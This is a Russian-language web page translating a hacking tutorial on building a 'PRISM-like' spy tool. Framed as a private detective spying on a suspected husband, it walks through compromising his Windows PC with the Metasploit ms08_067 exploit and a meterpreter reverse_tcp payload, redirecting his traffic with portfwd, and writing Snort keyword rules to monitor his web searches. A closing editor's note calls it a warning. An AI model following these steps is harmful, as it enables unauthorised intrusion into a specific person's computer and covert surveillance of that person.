Взламывать как профи: создаем свой собственный шпионский инструмент подобный PRISM
Оценка пользователей: / 2
ПлохоОтлично 

Профессиональный взлом

В последние недели откровение, что АНБ (NSA) шпионило за всеми нами, дало многим людям оружие в руки.
Автор все это принял сразу, как только предположил, что АНБ шпионит за всеми нами все время. Не поймите автора неправильно, автор не оправдывает их - он просто знает, что такое NSA.
В принципе, программа PRISM, которую АНБ использует, чтобы шпионить, может просматривать веб-трафик, искать ключевые слова и предупреждать АНБ, когда эти слова встречаются. А теперь представьте, что Вы частный детектив. Вы наняты женщиной, которая думает, что ее муж замышляет ее убийство. Можем ли мы реализовать свою собственную PRISM, чтобы выявить действительно ли он планирует это убийство, или ей просто мерещится?
Ответ на этот вопрос ... Конечно!
Для этого нам понадобится несколько вещей. Во-первых, мы должны идти на компроментацию компьютера подозреваемого с использованием Metasploit. Во-вторых, нам нужно перенаправить весь интернет-трафик подозреваемого через наш компьютер. В-третьих, мы должны будем создать сниффер в линии передачи, который будет искать ключевые слова, которые могут указывать на планы подозреваемого.
Довольно просто, не так ли?
Шаг 1: Компрометация компьютера подозреваемого
Начнем с Metasploit и загрузим эксплойт и полезную нагрузку. Убедитесь, что полезная нагрузка является одним из мощных meterpreter в Metasploit.
Автор использует полезную нагрузку exploit/windows/smb/ms08_067_netapi exploit with the windows/meterpreter/reverse_tcp, но Вы можете использовать любое количество методов, чтобы запустить meterpreter на машине подозреваемого, в том числе, malicious PDFWord doc, ссылку на вредоносный сервер и т.д.
Профессиональный взлом-1
Теперь, давайте используем систему и получим подсказки meterpreter, как показано ниже:
Профессиональный взлом-2
Шаг 2: Перенаправление трафика
Meterpreter является удобной маленькой программой, которая может перенаправить трафик с компьютера жертвы на любой компьютер с нашим выбором. Это называется переадресацией портов и может быть сделано командой portfwd. Итак, пишем:
·    meterpreter > portfwd -L 192.168.1.115 -l 80 -r 192.168.1.114 -p 80
Где:
  • L - локальный хост
  • l - локальный порт
  • r - удаленный хост
  • p - удаленный порт
Профессиональный взлом-3
Данная команда будет перенаправлять трафик с порта 80 (HTTP) жертвы на наш 80-й порт, где мы сможем этот трафик проверить.
Шаг 3: Настройка сниффера (Open Snort)
Snort является сниффером с открытым исходным кодом и системой обнаружения вторжений (IDS), которые могут быть приспособлены для этой задачи. Snort проверяет трафик и ищет сигнатуры вредоносного трафика. Одним из преимуществ Snort является то, что он позволяет нам писать свои собственные правила и настроить его любым способом, который хотим.
Snort предустановленный на BackTrack, экономя наше время и энергию. Мы можем добраться до каталога Snort, набрав:
·    cd /etc/snort
Затем можем просмотреть содержимое каталога с помощью команды:
·    /etc/snort ls -l
Вы должны получить экран, ниже:
Профессиональный взлом-4
Шаг 4: Настройка сниффера (конфигурирование KWrite)
Как автор уже говорил, почти все файлы в Linux и почти все конфигурационные файлы являются простыми текстовыми файлами. Конфигурационным файлом Snort является snort.conf и Вы можете увидеть его в каталоге /etc/snort. Давайте откроем его с KWrite
·    kwrite /etc/snort/snort.conf
Профессиональный взлом-5
Этот файл конфигурации можно использовать, чтобы подогнать Snort к любой среде. Для наших целей мы будем использовать конфигурацию по умолчанию с единственным исключением правил, которые мы добавим.
Если мы прокрутим вниз к нижней части этого файла, то увидим "includes", которые указывают Snort правила, которые используются для проверки трафика.
Профессиональный взлом-6
С целью использования Snort для создания нашего PRISM-подобной системы, мы не заинтересованы в правилах поиска вредоносного трафика - мы хотим создать правила, которые ориентированы на поиск ключевых слов в веб-трафике подозреваемого. Чтобы сделать это, мы должны закомментировать все, но локальные правила (закомментировать строки означает, что программа не будет их использовать). Мы можем сделать это, поместив # перед каждой включенным заявлением, но локальные (наши) правила.
Профессиональный взлом-7
Закончив комментирование каждого из включенных заявлений, но include $RULE_PATH/local.rules, зсохраните snort.conf и закройте KWrite.
Шаг 5: Настройка сниффера (написание правил)
Далее нам необходимо написать несколько правил, чтобы ловить контролируемый интернет-трафик подозреваемого и хранить его в локальном каталоге правил.
Профессиональный взлом-8
Во-первых, давайте откроем каталог локальных правил KWrite:
·    kwrite /etc/snort/rules/local.rules
Профессиональный взлом-9
Как Вы можете увидеть, каталог local.rules пустой. Каталог local.rules предназначен для использования правил, которые мы пишем. Правила Snort имеют такой основной формат:
• alert src.IP src.port --> dst.IP dst.port (content: "ключевое слово, которое мы ищем», msg: "сообщение, которое мы хотим отправлять оператору")
Сейчас мы напишем несколько правил для поиска ключевых слов, чтобы Snort предупреждал нас, когда они появляются в HTTP-трафике подозреваемого, например, в веб-поиске:
  • alert any 80 --> any 80 (content: "убийство", msg: "нашли ключевое слово убийство")
  • alert any 80 --> any 80 (content: "яд", msg: "нашли ключевое слово яд")
  • alert any 80 --> any 80 (content: "задушить", msg: "нашли ключевое слово задушить")
  • alert any 80 --> any 80 (content: "душить", msg: "нашли ключевое слово душить")
Мы могли бы продолжить до бесконечности этот список с ключевыми словами, которые, думаем, могут указывать на намерения подозреваемого.
Давайте добавим эти правила в каталог local.rules Snort:
Профессиональный взлом-10
Шаг 6: Запуск Snort
Наконец, мы должны запустить Snort, перейдя в BackTrack, затем в Services, далее в Snort и выбрать snort start.
Профессиональный взлом-11
Snort теперь приступит к изучению всех пакетов с компьютера подозреваемого, когда подозреваемый использует Google или другой веб-поисковик, посещает веб-сайты и т.д. Весь его трафик будет фильтроваться Snort и Вам будут отправляться предупреждения каждый раз, когда эти ключевые слова найдены. Тогда мы будем знать наверняка, что подозреваемый готовится к убийству своей жены!
Примечание редактора: Надеюсь, что этот учебный пример убедил Вас, как легко поставить Ваш компьютер под слежение и перехватывать весь Ваш трафик. Предупрежден, значит вооружен. Будьте оосторожны!
(Источник EN: null-byte.wonderhowto.com)
 
>
КнигаНовости Практика поискаПартнерыО нас
Підтримка та дизайн: Могильний С.С. Шаблон: Joomla Templates by BuyHTTP Joomla Hosting